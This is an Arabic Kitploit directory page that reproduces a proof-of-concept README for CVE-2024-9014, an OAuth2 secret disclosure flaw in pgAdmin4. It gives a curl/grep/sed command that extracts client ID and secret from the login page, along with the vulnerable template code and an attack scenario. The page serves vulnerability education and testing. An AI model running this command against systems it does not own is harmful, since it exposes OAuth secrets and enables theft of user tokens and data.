Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9014 — Pgadmin4 كشف المعلومات الحساسة | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2024-9014
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراقالتعلم والتعليم
GitHubeqstlab/cve-2024-9014

CVE-2024-9014

Pgadmin4 كشف المعلومات الحساسة

عرض المستودع
81منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9014

★ CVE-2024-9014 كشف المعلومات الحساسة - إثبات المفهوم ★

الوصف

CVE-2024-9014 : كشف المعلومات الحساسة في pgAdmin4

الوصف: إصدارات pgAdmin 8.11 والإصدارات الأقدم عرضة لثغرة أمنية في مصادقة OAuth2. تسمح هذه الثغرة للمهاجم باحتمال الحصول على معرف العميل والسر، مما يؤدي إلى وصول غير مصرح به لبيانات المستخدم.

إثبات المفهوم

الأمر

root@kitploit:~
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

مثال

root@kitploit:~
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

المخرجات

pgadmin4-8.9 و pgadmin4-8.12 نص بديل

التحليل

نقطة الضعف (pgadmin/templates/security/login_user.html)

عند هذه النقطة، يُرجع المتغير config.OAUTH2_CONFIG ملفات إعدادات OAUTH2 بما في ذلك OAUTH2_CLIENT_ID و OAUTH2_CLIENT_SECRET.

root@kitploit:~
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
    'userLanguage': user_language,
    'langOptions': ns.langOptions,
    'forgotPassUrl': url_for('browser.forgot_password'),
    'loginUrl': url_for('authenticate.login'),
    'csrfToken': csrf_token(),
    'authSources': config.AUTHENTICATION_SOURCES,
    'authSourcesEnum': {
        'OAUTH2': config.OAUTH2,
        'KERBEROS': config.KERBEROS,
    },
    'oauth2Config': config.OAUTH2_CONFIG,
    'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}


التصحيح

نص بديل

السيناريو

اختراق المعلومات الخاصة

تحديد وحماية معاملات OAuth السرية أمر مهم للغاية. بينما يمكن الكشف عن "client_id" بأمان، فإن الكشف عن "client_secret" يحمل مخاطر كبيرة. إذا تم اختراق client_secret، يمكن للمهاجم استغلال هوية وثقة التطبيق لسرقة "access token" الخاص بالمستخدم ومعلوماته الشخصية.

إخلاء مسؤولية

لا يُقصد من هذا المستودع كشف المعلومات الحساسة المتعلقة بـ CVE-2024-9014. الغرض من هذا المشروع هو مساعدة الأشخاص على التعلم عن هذه الثغرة، وربما اختبار تطبيقاتهم الخاصة.

رؤية EQST

ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة في الشهر. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا. https://www.skshieldus.com/eng/business/insight.do

المرجع

https://nvd.nist.gov/vuln/detail/CVE-2024-9014

تنزيل الأداة